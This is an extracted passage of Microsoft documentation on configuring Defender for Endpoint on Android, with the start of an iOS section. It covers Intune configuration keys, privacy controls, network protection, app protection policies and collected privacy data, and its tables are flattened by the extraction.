(only
available on
android) on
mobile.
Privacy configuration
ﾉ Expand table
config key
Privacy for If privacy is Hide URLs in DefenderExcludeURLInReport = DefenderExcludeURLInReport =

phishing alert enabled, report=0(default)/1 0(default)/1 0(default)/1
report Defender for
Endpoint
won't send
domain
name and
website
details
Configure Control the Hide app details in DefenderExcludeAppInReport =

Privacy for collection of report= 0(default)/1
malware app details 0(default)/1
threat report (name,
package
information)
in the threat
report
Configure Control what Enable DefenderTVMPrivacyMode = DefenderTVMPrivacyMode =

privacy in app data Vulnerability 0(default)/1 0(default)/1
vulnerability shows up in Management
assessment of the security privacy=
apps portal when 0(default)/1
Defender for
Vulnerability
Management
is enabled
Network Control the Enable Network DefenderNetworkProtectionPrivacy DefenderNetworkProtectionPrivacy

protection collection of protection privacy = 1/0
network and = 1/0
certificate
details in the
alert report
Other configurations
ﾉ Expand table

config key
Disable/enable Sign out option Disable sign DisableSignOut = 1/0 DisableSignOut = 1/0
sign out can be disabled out =
for an end user. 1(default)/0
This helps prevent
tampering with
the device.
Device tagging Defender for Device tag DefenderDeviceTag (Value as DefenderDeviceTag (Value as
Endpoint enables (Value as String) String)
bulk tagging String)
mobile devices
during
config key
onboarding.
Admins can set up
tags using this
configuration by
using Intune.
Optional Admins can make NA DefenderOptionalVPN = DefenderOptionalVPN =

Permissions some permissions 0(default)/1, 0(default)/1,
optional for the DefenderOptionalAccessibility DefenderOptionalAccessibility
end user while = 0(default)/1 = 0(default)/1
onboarding
Defender for
Endpoint. Users
see an option to
grant these
permissions later.
Alerts severity and privacy information

ﾉ Expand table
Alert type Severity Privacy information (Android) Privacy information (iOS)
Anti-phishing Informational URL of malicious connection, connection Domain name, IP address of

(Defender warning) information, Protocol type; More information malicious website; More
information
Anti-phishing Low
(Defender warning
overlooked)
Anti-malware Medium Information about malicious APKs including

install source, storage location, time of install,
etc.; More information
Jailbreak High NA NA
Rogue Wifi Low
Open Network Informational

detection
Suspicious certificates Informational
Complete privacy information for Android
Complete privacy information for iOS
Microsoft Defender Mobile App exclusion from

Conditional Access(CA) Policies
Microsoft Defender Mobile app is a security app that needs to constantly be running in the background to
report the device security posture. This security posture is used in the Compliance and App Protection
policies to secure the managed apps and ensure that corporate data is accessed only in a secured device.
However, with restrictive Conditional Access policies such as having Block policies based on certain
locations, or enforcing frequent sign ins can result in Defender blocked from reporting posture. If the
Defender app fails to report the device posture this can lead to situation where the device is under a threat,
leading to vulnerability of corporate data on the device. To ensure seamless protection, we recommend
excluding the Defender app from the blocking Conditional Access Policy.
Apps required to exclude:

1. Xplat Broker App ( a0e84e36-b067-4d5c-ab4a-3db38e598ae2) Xplat Broker App is the application
responsible for forwarding Defender risk signals to the Defender backend. However, the presence of
restrictive CA policies can result in Defender blocked from reporting signals. In these scenarios, we
recommend excluding the Xplat Broker App. Note, that Xplat Broker App is also used by other
platforms like Mac and Linux. So if the policy is same for these platforms, it is better to create a
separate Conditional Access policy for Mobile.
2. TVM app (e724aa31-0f56-4018-b8be-f8cb82ca1196) Microsoft Defender for Mobile TVM (Threat and
Vulnerability Management) is the service, which provides the vulnerability assessment for the installed
apps on the iOS devices. However, the presence of restrictive CA policies can result in Defender
blocked from communicating the onboarding requests to the TVM backend services. This service
should be excluded if MDVM (Vulnerability Assessment) is used in the organization.
Steps to exclude:
1. Create service principal for the apps that needs to be excluded. Steps to create service principal..
2. While creating the service principal object above, use these app IDs: Xplat Broker App ( a0e84e36-
b067-4d5c-ab4a-3db38e598ae2), TVM app (e724aa31-0f56-4018-b8be-f8cb82ca1196).
3. After the object is successfully created the two apps are visible in the CA screen and can be excluded.
Feedback

Configure Defender for Endpoint on
Android features
Article • 08/04/2023
Applies to:

Conditional Access with Defender for Endpoint

on Android
Microsoft Defender for Endpoint on Android, along with Microsoft Intune and Microsoft
Entra ID, enables enforcing Device compliance and Conditional Access policies based on
device risk levels. Defender for Endpoint is a Mobile Threat Defense (MTD) solution that
you can deploy through Intune.
For more information about how to set up Defender for Endpoint on Android and
Conditional Access, see Defender for Endpoint and Intune.
Configure custom indicators
７ Note
Defender for Endpoint on Android only supports creating custom indicators for IP
addresses and URLs/domains.
Defender for Endpoint on Android enables admins to configure custom indicators to

support Android devices as well. For more information on how to configure custom
indicators, see Manage indicators.
Configure web protection

Defender for Endpoint on Android allows IT Administrators the ability to configure the
web protection feature. This capability is available within the Microsoft Intune admin
center.
Web protection helps to secure devices against web threats and protect users from
phishing attacks. Anti-phishing and custom indicators (URL and IP addresses) are
supported as part of web protection. Web content filtering is currently not supported on
mobile platforms.
７ Note
Defender for Endpoint on Android would use a VPN in order to provide the Web
Protection feature. This VPN is not a regular VPN. Instead, it's a local/self-looping
VPN that does not take traffic outside the device.
For more information, see Configure web protection on devices that run Android.
Network Protection
This feature provides protection against rogue Wi-Fi related threats and rogue
certificates, which are the primary attack vector for Wi-Fi networks. Admins can list the
root Certificate Authority (CA) and private root CA certificates in Microsoft Intune admin
center and establish trust with endpoints. It provides the user a guided experience to
connect to secure networks and also notifies them if a related threat is detected.
feature from within the Microsoft Intune admin center and add trusted certificates.
Admins can enable privacy controls to configure the data sent to Defender for Endpoint
from Android devices.
Network protection in Microsoft Defender for endpoint is disabled by default. Admins

can use the following steps to configure Network protection in Android devices.
1. In the Microsoft Intune admin center, navigate to Apps > App configuration
policies. Create a new App configuration policy.
2. Provide a name and description to uniquely identify the policy. Select 'Android
Enterprise' as the platform and 'Personally-owned work profile only' as the profile
type and 'Microsoft Defender' as the Targeted app.
3. In Settings page, select 'Use configuration designer' and add 'Enable Network
Protection in Microsoft Defender' as the key and value as '1' to enable Network
Protection. (Network protection is disabled by default)
4. If your organization uses root CAs that are private, you must establish explicit trust
between Intune (MDM solution) and user devices. Establishing trust helps prevent
Defender from flagging root CAs as rogue certificates.
To establish trust for the root CAs, use 'Trusted CA certificate list for Network
Protection' as the key. In the value, add the 'comma separated list of certificate
thumbprints (SHA 1)'.
Example of Thumbprint format to add: 50 30 06 09 1d 97 d4 f5 ae 39 f7 cb e7

92 7d 7d 65 2d 34 31, 503006091d97d4f5ae39f7cbe7927d7d652d3431
） Important
Certificate SHA-1 Thumbprint characters should be with either white space

separated, or non separated.
This format is invalid:

50:30:06:09:1d:97:d4:f5:ae:39:f7:cb:e7:92:7d:7d:65:2d:34:31
Any other separation characters are invalid.
5. For other configurations related to Network protection, add the following keys and
appropriate corresponding value.
ﾉ Expand table
Configuration Description
Key
Trusted CA Security admins manage this setting to establish trust for root CA and
certificate list for self-signed certificates.
Network
Protection
Enable Network 1 - Enable, 0- Disable (default). This setting is used by the IT admin to
protection in enable or disable the network protection capabilities in the Defender
Microsoft app.
Defender
Enable Network 1 - Enable (default), 0 - Disable. Security admins manage this setting
Protection Privacy to enable or disable privacy in network protection.
Enable Users to 1 - Enable, 0 - Disable (default). Security admins manage this setting
Trust Networks to enable or disable the end user's in-app experience to trust and
and Certificates untrust unsecure and suspicious networks and malicious certificates.
Automatic 1 - Enable (default), 0 - Disable. Security admins manage this setting

Remediation of to enable or disable the remediation alerts that are sent when a user
Network performs remediation activities, such as switching to a safer Wi-Fi
Protection Alerts access point or deleting suspicious certificates detected by Defender.
Manage Network 0 - Disable (default), 1 - Audit Mode, 2 - Enable. Security admins

Protection manage this setting to disable, audit, or enable open network
detection for Open detection, respectively. In 'Audit' mode, alerts are sent only to the ATP
Networks
Configuration Description
Key
portal with no end user experience. For user experience, set the config
to 'Enable' mode.
Manage Network 0 - Disable, 1 - Audit mode (default), 2 - Enable. When network

protection protection is enabled, Audit mode for certificate detection is enabled
Detection for by default. In Audit mode, notification alerts are sent to SOC admins,
Certificates but no end-user notifications are displayed to the user when Defender
detects a bad certificate. Admins can, however, disable this detection
with 0 as the value and enable full feature functionality by setting 2 as
the value. When the feature is enabled with the value of 2, end-user
notifications are sent to the user when Defender detects a bad
certificate, and alerts are also sent to the SOC Admin.
6. Add the required groups to which the policy will have to be applied. Review and
create the policy.
ﾉ Expand table
Configuration Key Description
Enable Network 1: Enable

protection in 0: Disable (default)
Microsoft Defender
This setting is used by the IT admin to enable or disable the network
protection capabilities in the Defender app.
Enable Network 1: Enable (default)

Protection Privacy 0: Disable
Security admins manage this setting to enable or disable privacy in

network protection.
Enable Users to 1
Trust Networks and Enable
Certificates 0:Disable (default)
This setting is used by IT admins to enable or disable the end user in-
app experience to trust and untrust the unsecure and suspicious
networks and malicious certificates.
Automatic 1: Enable (default)

Remediation of 0: Disable
Network Protection
Alerts This setting is used by IT admins to enable or disable the
remediation alerts that are sent when a user does remediation
Configuration Key Description
activities. For example, the user switches to a safer Wi-Fi access point
or deletes suspicious certificates that were detected by Defender.
Manage Network 0: Disable (default)

Protection 1: Audit Mode
detection for Open
Networks Security admins manage this setting to enable or disable open
network detection.
Manage Network 0: Disable

protection 1: Audit mode (default)
Detection for 2: Enable
Certificates
When network protection is enabled, Audit mode for certificate
detection is enabled by default. In audit mode, notification alerts are
sent to SOC admins, but no end user notifications are shown when
Defender detects a bad certificate. Admins can disable this detection
with the value 0 or enable full feature functionality by setting the
value 2. When the value is 2, end user notifications are sent to users
and alerts are sent to SOC admins when Defender detects a bad
certificate.
7. Add the required groups to which the policy has to be applied. Review and create
the policy.
７ Note
Users need to enable location permission (which is an optional permission); this

enables Defender for Endpoint to scan their networks and alert them when there
are WIFI-related threats. If the location permission is denied by the user, Defender
for Endpoint will only be able to provide limited protection against network threats
and will only protect the users from rogue certificates.
Privacy Controls
Following privacy controls are available for configuring the data that is sent by Defender
for Endpoint from Android devices:
ﾉ Expand table
Threat Report Details
Malware report Admins can set up privacy control for malware report. If privacy is enabled,
then Defender for Endpoint won't send the malware app name and other
app details as part of the malware alert report.
Phish report Admins can set up privacy control for phishing reports. If privacy is enabled,
then Defender for Endpoint won't send the domain name and details of the
unsafe website as part of the phishing alert report.
Vulnerability By default only information about apps installed in the work profile is sent
assessment of for vulnerability assessment. Admins can disable privacy to include personal
apps apps
Network Admins can enable or disable privacy in network protection. If enabled, then
Protection Defender won't send network details.
(preview)
Configure privacy alert report

Admins can now enable privacy control for the phishing report, malware report, and
network report sent by Microsoft Defender for Endpoint on Android. This configuration
ensures that the domain name, app details, and network details, respectively, aren't sent
as part of the alert whenever a corresponding threat is detected.
Admin Privacy Controls (MDM) Use the following steps to enable privacy.
1. In Microsoft Intune admin center, go to Apps > App configuration policies > Add
> Managed devices.
2. Give the policy a name, Platform > Android enterprise, select the profile type.
3. Select Microsoft Defender for Endpoint as the target app.
4. On the Settings page, select Use configuration designer and then select Add.
5. Select the required privacy setting -
Hide URLs in report

Hide URLs in report for personal profile
Hide app details in report
Hide app details in report for personal profile
Enable Network Protection Privacy
6. To enable privacy, enter integer value as 1 and assign this policy to users. By
default, this value is set to 0 for MDE in work profile and 1 for MDE on personal
profile.
7. Review and assign this profile to targeted devices/users.
End user privacy controls

These controls help the end user to configure the information shared to their
organization.
1. For Android Enterprise work profile, end user controls won't be visible. Admins
control these settings.
2. For Android Enterprise personal profile, the control is displayed under Settings>
Privacy.
3. Users see a toggle for Unsafe Site Info, malicious application, and network
protection.
These toggles will only be visible if enabled by the admin. Users can decide if they want
to send the information to their organization or not.
Enabling/disabling the above privacy controls won't impact the device compliance check
or conditional access.
Configure vulnerability assessment of apps for

BYOD devices
From version 1.0.3425.0303 of Microsoft Defender for Endpoint on Android, you're able
to run vulnerability assessments of the OS and apps installed on the onboarded mobile
devices.
７ Note
Vulnerability assessment is part of Microsoft Defender Vulnerability Management

in Microsoft Defender for Endpoint.
Notes about privacy related to apps from personal devices (BYOD):
For Android Enterprise with a work profile, only apps installed on the work profile
will be supported.
For other BYOD modes, by default, vulnerability assessment of apps will not be
enabled. However, when the device is on administrator mode, admins can explicitly
enable this feature through Microsoft Intune to get the list of apps installed on the
device. For more information, see details below.
Configure privacy for device administrator mode

Use the following steps to enable vulnerability assessment of apps from devices in
device administrator mode for targeted users.
７ Note
By default, this is turned off for devices enrolled with device admin mode.
1. In Microsoft Intune admin center , go to Devices > Configuration profiles >

Create profile and enter the following settings:
Platform: Select Android device administrator

Profile: Select "Custom" and select Create.
2. In the Basics section, specify a name and description of the profile.
3. In the Configuration settings, select Add OMA-URI setting:
Name: Enter a unique name and description for this OMA-URI setting so you
can find it easily later.
OMA-URI: ./Vendor/MSFT/DefenderATP/DefenderTVMPrivacyMode
Data type: Select Integer in the drop-down list.
Value: Enter 0 to disable privacy setting (By default, the value is 1)
4. Select Next and assign this profile to targeted devices/users.
Configure privacy for Android Enterprise work profile

Defender for Endpoint supports vulnerability assessment of apps in the work profile.
However, in case you want to turn off this feature for targeted users, you can use the
following steps:
1. In Microsoft Intune admin center , go to Apps > App configuration policies \>
Add > Managed devices.
2. Give the policy a name; Platform > Android Enterprise; select the profile type.
4. In Settings page, select Use configuration designer and add
DefenderTVMPrivacyMode as the key and value type as Integer
To disable vulnerability of apps in the work profile, enter value as 1 and
assign this policy to users. By default, this value is set to 0 .
For users with key set as 0 , Defender for Endpoint sends the list of apps from
the work profile to the backend service for vulnerability assessment.
Turning the above privacy controls on or off won't impact the device compliance check
Configure privacy for phishing alert report

Privacy control for phish report can be used to disable the collection of domain name or
website information in the phish threat report. This setting gives organizations the
flexibility to choose whether they want to collect the domain name when a malicious or
phish website is detected and blocked by Defender for Endpoint.
Configure privacy for phishing alert report on Android

Device Administrator enrolled devices:
Use the following steps to turn it on for targeted users:

Platform: Select Android device administrator.

OMA-URI: ./Vendor/MSFT/DefenderATP/DefenderExcludeURLInReport
Value: Enter 1 to enable privacy setting. The default value is 0.
Using this privacy control won't impact the device compliance check or conditional
access.
Configure privacy for phishing alert report on Android
Enterprise work profile
Use the following steps to turn on privacy for targeted users in the work profile:
1. In Microsoft Intune admin center and go to Apps > App configuration policies
> Add > Managed devices.
2. Give the policy a name, Platform > Android Enterprise, select the profile type.
DefenderExcludeURLInReport as the key and value type as Integer.
Enter 1 to enable privacy. The default value is 0.
Turning the above privacy controls on or off won't impact the device compliance check
Configure privacy for malware threat report

Privacy control for malware threat report can be used to disable the collection of app
details (name and package information) from the malware threat report. This setting
gives organizations the flexibility to choose whether they want to collect the app name
when a malicious app is detected.
Configure privacy for malware alert report on Android

Device Administrator enrolled devices:
Use the following steps to turn it on for targeted users:

Platform: Select Android device administrator.

OMA-URI: ./Vendor/MSFT/DefenderATP/DefenderExcludeAppInReport
Value: Enter 1 to enable privacy setting. The default value is 0.
access. For example, devices with a malicious app will always have a risk level of
"Medium".
Configure privacy for malware alert report on Android

Enterprise work profile
Use the following steps to turn on privacy for targeted users in the work profile:
1. In Microsoft Intune admin center and go to Apps > App configuration policies
2. Give the policy a name, Platform > Android Enterprise, select the profile type.
DefenderExcludeAppInReport as the key and value type as Integer
Enter 1 to enable privacy. The default value is 0.
access. For example, devices with a malicious app will always have a risk level of
"Medium".
Disable sign-out
Defender for Endpoint supports deployment without the sign-out button in the app to
prevent users from signing out of the Defender app. This is important to prevent users
from tampering with the device. Use the following steps to configure Disable sign-out:
1. In Microsoft Intune admin center , go to Apps > App configuration policies >
2. Give the policy a name, select Platform > Android Enterprise, and select the
profile type.
4. In the Settings page, select Use configuration designer and add Disable Sign Out
as the key and Integer as the value type.
By default, Disable Sign Out = 1 for Android Enterprise personally owned

work profiles, fully managed, company owned personally enabled profiles
and 0 for device administrator mode.
Admins need to make Disable Sign Out = 0 to enable the sign-out button in
the app. Users will be able to see the sign-out button once the policy is
pushed.
5. Select Next and assign this profile to targeted devices and users.
） Important
This feature is in Public Preview. The following information relates to prereleased

product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information
provided here.
Device Tagging
Defender for Endpoint on Android enables bulk tagging the mobile devices during
onboarding by allowing the admins to set up tags via Intune. Admin can configure the
device tags through Intune via configuration policies and push them to user's devices.
Once the User installs and activates Defender, the client app passes the device tags to
the Security Portal. The Device tags appear against the devices in the Device Inventory.
Use the following steps to configure the Device tags:
1. In Microsoft Intune admin center , go to Apps > App configuration policies >
2. Give the policy a name, select Platform > Android Enterprise, and select the
profile type.
4. In Settings page, select Use configuration designer and add DefenderDeviceTag as

the key and value type as String.
Admin can assign a new tag by adding the key DefenderDeviceTag and
setting a value for device tag.
Admin can edit an existing tag by modifying the value of the key
DefenderDeviceTag.
Admin can delete an existing tag by removing the key DefenderDeviceTag.
5. Click Next and assign this policy to targeted devices and users.
７ Note
The Defender app needs to be opened for tags to be synced with Intune and
passed to Security Portal. It may take upto 18 hours for tags to reflect in the portal.
Related articles
 Tip
Feedback

Endpoint on Android risk signals using
App Protection Policies (MAM)
Article • 01/05/2024
Applies to:

Microsoft Defender for Endpoint on Android, which already protects enterprise users on
Mobile Device Management (MDM) scenarios, now extends support to Mobile App
Management (MAM), for devices that aren't enrolled using Intune mobile device
management (MDM). It also extends this support to customers who use other enterprise
mobility management solutions, while still using Intune for mobile application
management (MAM). This capability allows you to manage and protect your
organization's data within an application.
Microsoft Defender for Endpoint on Android threat information is applied by Intune App
Protection Policies to protect these apps. App protection policies (APP) are rules that
ensure an organization's data remains safe or contained in a managed app. A managed
application has app protection policies applied to it and can be managed by Intune.
Microsoft Defender for Endpoint on Android supports both the configurations of MAM.
Intune MDM + MAM: IT administrators can only manage apps using App
Protection Policies on devices that are enrolled with Intune mobile device
management (MDM).
MAM without device enrollment: MAM without device enrollment, or MAM-WE,
allows IT administrators to manage apps using App Protection Policies on devices
not enrolled with Intune MDM. This provision means that apps can be managed by
Intune on devices enrolled with third-party EMM providers. To manage apps in
both these configurations customers should use Intune in the Microsoft Intune
admin center .
To enable this capability an administrator needs to configure the connection between

Microsoft Defender for Endpoint and Intune, create the app protection policy, and apply
the policy on targeted devices and applications.
End users also need to take steps to install Microsoft Defender for Endpoint on their
device and activate the onboarding flow.
Admin prerequisites
Validate that the Microsoft Defender for Endpoint-Intune connector is enabled.
a. Go to security.microsoft.com.
b. Select Settings > Endpoints > Advanced Features > Microsoft Intune
Connection is turned on.
c. If the connection isn't turned on, select the toggle to turn it on and then select
Save Preferences.
d. Go to the Microsoft Intune admin center and Validate whether Microsoft

Defender for Endpoint-Intune connector is enabled.

Enable Microsoft Defender for Endpoint on Android Connector for App
Protection Policy (APP).
Configure the connector on Microsoft Intune for App protection policies:
a. Go to Tenant Administration > Connectors and Tokens > Microsoft Defender

for Endpoint.
b. Turn on the toggle for the app protection policy for Android (as seen in the
following screenshot).
c. Select Save.
Create an app protection policy.
Block access or wipe data of a managed app based on Microsoft Defender for
Endpoint risk signals by creating an app protection policy.
Microsoft Defender for Endpoint can be configured to send threat signals to be

used in app protection policies (APP, also known as MAM). With this capability,
you can use Microsoft Defender for Endpoint to protect managed apps.
1. Create a policy.
App protection policies (APP) are rules that ensure an organization's data
remains safe or contained in a managed app. A policy can be a rule that is
enforced when the user attempts to access or move "corporate" data, or a set
of actions that are prohibited or monitored when the user is inside the app.

2. Add apps.
a. Choose how you want to apply this policy to apps on different devices.
Then add at least one app.
Use this option to specify whether this policy applies to unmanaged devices.
In Android, you can specify the policy applies to Android Enterprise, Device
Admin, or Unmanaged devices. You can also choose to target your policy to
apps on devices of any management state.
Because mobile app management doesn't require device management, you

can protect company data on both managed and unmanaged devices. The
management is centered on the user identity, which removes the
requirement for device management. Companies can use app protection
policies with or without MDM at the same time. For example, consider an
employee that uses both a phone issued by the company, and their own
personal tablet. The company phone is enrolled in MDM and protected by
app protection policies while the personal device is protected by app
protection policies only.
b. Select Apps.
A managed app is an app that has app protection policies applied to it, and
can be managed by Intune. Any app that has been integrated with the Intune
SDK or wrapped by the Intune App Wrapping Tool can be managed using
Intune app protection Policies. See the official list of Microsoft Intune
protected apps that have been built using these tools and are available for
public use.
Example: Outlook as a managed app
3. Set sign-in security requirements for your protection policy.
Select Setting > Max allowed device threat level in Device Conditions and
enter a value. Then select Action: "Block Access". Microsoft Defender for
Endpoint on Android shares this Device Threat Level.
Assign user groups for whom the policy needs to be applied.
Select Included groups. Then add the relevant groups.


７ Note
If a config policy is to be targeted at unenrolled devices (MAM), the

recommendation is to deploy the general app configuration settings in Managed
Apps instead of using Managed Devices. When deploying app configuration
policies to devices, issues can occur when multiple policies have different values for
the same configuration key and are targeted for the same app and user. These
issues are due to the lack of a conflict resolution mechanism for resolving the
differing values. You can prevent these issues by ensuring that only a single app
configuration policy for devices is defined and targeted for the same app and user.
End-user prerequisites
The broker app must be installed.
Intune Company Portal
Users have the required licenses for the managed app and have the app installed.
End-user onboarding
1. Sign in to a managed application, for example, Outlook. The device is registered
and the application protection policy is synchronized to the device. The application
protection policy recognizes the device's health state.
2. Select Continue. A screen is presented which recommends downloading and

setting up of Microsoft Defender for Endpoint on Android app.
3. Select Download. You'll be redirected to the app store (Google play).

4. Install the Microsoft Defender for Endpoint (Mobile) app and launch back
Managed app onboarding screen.
5. Click Continue > Launch. The Microsoft Defender for Endpoint app
onboarding/activation flow is initiated. Follow the steps to complete onboarding.
You'll automatically be redirected back to Managed app onboarding screen, which
now indicates that the device is healthy.
6. Select Continue to log into the managed application.
Configure Web protection

Defender for Endpoint on Android allows IT Administrators to configure web protection.
Web protection is available within the Microsoft Intune admin center .
Web protection helps to secure devices against web threats and protect users from
phishing attacks. Note that anti-phishing and custom indicators (URL and IP addresses)
are supported as part of web protection. Web content filtering is currently not
supported on mobile platforms.
1. In the Microsoft Intune admin center, go to Apps > App configuration policies >
Add > Managed apps.
2. Give the policy a name.
3. Under Select Public Apps, choose Microsoft Defender for Endpoint as the target
app.
4. In the Settings page, under the General Configuration Settings, add the following
keys and set their value as required.
antiphishing
vpn
To disable web protection, enter 0 for the antiphishing and VPN values.
To disable only the use of VPN by web protection, enter these values:
0 for vpn
1 for antiphishing
Add DefenderMAMConfigs key and set the value as 1.
5. Assign this policy to users. By default, this value is set to false.
6. Review and create the policy.
Configure Network Protection

1. In Microsoft Intune admin center, navigate to Apps > App configuration policies.
Create a new App configuration policy. Click Managed Apps.
2. Provide a name and description to uniquely identify the policy. Target the policy to
'Selected apps' and search for 'Microsoft Defender Endpoint for Android'. Click
the entry and then click Select and then Next.
3. Add the key and value from the following table. Ensure that the
"DefenderMAMConfigs" key is present in every policy that you create using
Managed Apps route. For Managed Devices route, this key shouldn't exist. When
you're done, click Next.
ﾉ Expand table
Key Value Default Description

Type (true-
enable,
false-
disable)
DefenderNetworkProtectionEnable Integer 0 1 - Enable , 0 - Disable ;

This setting is used by IT
admins to enable or
disable the network
protection capabilities in
the defender app
DefenderAllowlistedCACertificates String None None-Disable; This

setting is managed by
an admin to establish
trust for root CA and self
signed certificates.
Type (true-
enable,
false-
disable)
DefenderCertificateDetection Integer 1 0 - Disable , 1 - Audit

mode , 2 - Enable ;
When network
protection is enabled,
Audit mode for
certificate detection is
enabled by default. In
audit mode, notification
alerts are sent to SOC
admins, but no end user
notifications are
displayed to the user
when Defender detects
a bad certificate. Admins
can disable this
detection with 0 as the
value and enable full
feature functionality by
setting 2 as the value.
When this feature is
enabled with value as 2,
end user notifications
are sent to the user
when Defender detects
a bad certificate. Alerts
are also sent to SOC
Admins.
DefenderOpenNetworkDetection Integer 0 1 - enable, 0 - disable;

This setting is managed
by IT Admins to enable
or disable open network
detection informational
alerts with no end user
detection experience.
DefenderEndUserTrustFlowEnable String false true - enable, false -

disable; This setting is
used by IT admins to
enable or disable the
end user in-app
experience to trust and
Type (true-
enable,
false-
disable)
untrust the unsecure

and suspicious networks.
DefenderNetworkProtectionAutoRemediation String true true - enable, false -

used by the IT admin to
remediation alerts that
are sent when a user
performs remediation
activities like switching
to safer Wi-Fi access
points or deleting
suspicious certificates
detected by Defender.
DefenderNetworkProtectionPrivacy String true true - enable, false -

managed by IT admins
to enable or disable
privacy in network
protection.
4. Include or exclude the groups you want the policy to apply to. Proceed to review
and submit the policy.
７ Note
Users need to enable location permission (which is an optional permission); this

enables Defender for Endpoint to scan their networks and alert them when there
are WiFi-related threats. If the location permission is denied by the user, Defender
for Endpoint will only be able to provide limited protection against network threats
and will only protect the users from rogue certificates.
Configure privacy controls

Admins can use the following steps to enable privacy and not collect the domain name,
app details and network information as part of the alert report for corresponding
threats.
> Managed apps.
3. Under the Select Public Apps, choose Microsoft Defender for Endpoint as the
target app.
4. On the Settings page, under General Configuration Settings, add

DefenderExcludeURLInReport and DefenderExcludeAppInReport as the keys and
value as 1.
5. Add DefenderMAMConfigs key and set the value as 1.
6. Assign this policy to users. By default, this value is set to 0.
7. In Settings page, under the General Configuration Settings add

DefenderExcludeURLInReport, DefenderExcludeAppInReport as the keys and
value as true.
9. Assign this policy to users. By default, this value is set to false.
10. Review and create the policy.
Optional permissions
Microsoft Defender for Endpoint on Android enables Optional Permissions in the
onboarding flow. With this feature, admin can deploy MDE on Android devices with
MAM policies without enforcing the mandatory VPN and Accessibility Permissions
during onboarding. End Users can onboard the app without the mandatory permissions
and can later review these permissions.
Configure optional permission

Use the following steps to enable Optional permissions for devices.
> Managed apps.
3. Select Microsoft Defender for Endpoint in public apps.

4. On the Settings page, select Use configuration designer and
DefenderOptionalVPN or DefenderOptionalAccessibility or both as the key.
6. To enable Optional permissions, enter the value as 1 and assign this policy to users.
By default, this value is set to 0. For users with key set as 1, they will be able to
onboard the app without giving these permissions.
7. In Settings page, select Use configuration designer and DefenderOptionalVPN or

DefenderOptionalAccessibility or both as the key and value type as Boolean.
9. To enable Optional permissions, enter value as true and assign this policy to users.
By default, this value is set to false. For users with key set as true, the users are able
to onboard the app without giving these permissions.
User flow
Users can install and open the app to start the onboarding process.
1. If an admin has setup Optional permissions, then users can choose to skip the VPN
or accessibility permission or both and complete onboarding.
2. Even if the user has skipped these permissions, the device is able to onboard, and
a heartbeat will be sent.
3. Since permissions are disabled, Web protection won't be active. It will be partially
active if one of the permissions is given.
4. Later, users can enable Web protection from within the app. This will install the
VPN configuration on the device.
７ Note
The Optional permissions setting is different from the Disable Web protection
setting. Optional permissions only help to skip the permissions during onboarding
but it's available for the end user to later review and enable while Disable Web
protection allows users to onboard the Microsoft Defender for Endpoint app
without the Web Protection. It cannot be enabled later.
Disable sign out
Defender for Endpoint allows you to deploy the app and disabling the sign out button.
By hiding the sign out button, users are prevented from signing out of the Defender
app. This action helps prevent tampering with the device when Defender for Endpoint
isn't running.
Use the following steps to configure the Disable sign out:
Add > Managed apps.
2. Provide the policy a name.
app.
4. In the Settings page, under the General Configuration Settings, add
DisableSignOut as the key and set the value as 1.
By default, Disable Sign Out = 0.

Admin needs to make Disable Sign Out = 1 to disable the sign-out button in
the app. Users will not see the sign out button once the policy is pushed to
the device.
5. Select Next and assign this profile to targeted devices and users.
） Important

provided here.
Device Tagging
Defender for Endpoint on Android enables bulk tagging the mobile devices during
Use the following steps to configure the Device tags:

Add > Managed apps.
2. Provide the policy a name.
app.

DefenderDeviceTag.
5. Click Next and assign this policy to targeted devices and users.
７ Note
Related topics
 Tip
Feedback

Android - Privacy information
Article • 10/20/2023
Applies to:

Defender for Endpoint on Android collects information from your configured Android
devices and stores it in the same tenant where you have Defender for Endpoint. The
information is collected to help keep Defender for Endpoint for Android secure, up to
date, performing as expected, and to support the service.
For more information about data storage, see Microsoft Defender for Endpoint data
Information is collected to help keep Defender for Endpoint for Android secure, up to
date, performing as expected and to support the service.
For more information on most common privacy questions about Microsoft Defender for
Endpoint on Android and iOS mobile devices, see Microsoft Defender for Endpoint and
your privacy on Android and iOS mobile devices .
Required Data
Required data consists of data that is necessary to make Defender for Endpoint for
Android work as expected. This data is essential to the operation of the service and can
include data related to the end user, organization, device, and apps. Here's a list of the
types of data being collected:
App information
Information about malicious Android application packages (APKs) on the device
including
Install source
Storage location (file path) of the APK
Time of install, size of APK and permissions
For Android Enterprise Fully managed devices - Information about Android application
packages (APKs) installed on the device including
Name and package name of the app

Version number of the app
Vendor name
For Android Enterprise with a work profile - Information about Android application
packages (APKs) installed on the Work profile of the device including
Name and package name of the app

Version number of the app
Vendor name
Your organization can also choose to configure Defender for Endpoint to send information
about all apps installed on the device. By default, this information is not sent to your
organization.
Web page / Network information

Full URL of the website only when a malicious connection or web page is detected
and blocked.
Connection information
Protocol type (such as HTTP, HTTPS, etc.)
Device and account information

Device information such as date & time, Android version, OEM model, CPU info,
and Device identifier.
Device identifier is one of the below:

Wi-Fi adapter MAC address
Android ID (as generated by Android at the time of first boot of the device).
Randomly generated globally unique identifier (GUID).
Tenant, Device and User information

Microsoft Entra Device ID and Azure User ID: Uniquely identifies the device, User
respectively at Microsoft Entra ID.
Azure tenant ID: GUID that identifies your organization within Microsoft Entra
ID.
Microsoft Defender for Endpoint org ID: Unique identifier associated with the
enterprise that the device belongs to. Allows Microsoft to identify whether
issues are impacting a select set of enterprises and how many enterprises are
impacted.
User Principal Name: Email ID of the user
Product and service usage data

The following information is collected only for Microsoft Defender for Endpoint app
installed on the device.
App package info, including name, version, and app upgrade status.
Actions performed in the app.
Threat detection information, such as threat name, category, etc.
Crash report logs generated by Android.
Optional Data
Optional data includes diagnostic data and feedback data. Optional diagnostic data is
additional data that helps us make product improvements and provides enhanced
information to help us detect, diagnose, and fix issues. Optional diagnostic data
includes:
App, CPU, and network usage.

State of the device from the app perspective, including scan status, scan timings,
app permissions granted, and upgrade status.
Features configured by the admin.
Basic information about the browsers on the device.
Feedback Data is collected through in-app feedback provided by the user
The user's email address, if they choose to provide it.

Feedback type (smile, frown, idea) and any feedback comments submitted by the
user.
 Tip
Feedback

Endpoint on iOS features
Article • 02/21/2024
Applies to:

７ Note
Defender for Endpoint on iOS would use a VPN in order to provide the Web
Protection feature. This is not a regular VPN and is a local/self-looping VPN that
does not take traffic outside the device.
Conditional Access with Defender for Endpoint

on iOS
Microsoft Defender for Endpoint on iOS along with Microsoft Intune and Microsoft Entra
ID enables enforcing Device compliance and Conditional Access policies based on
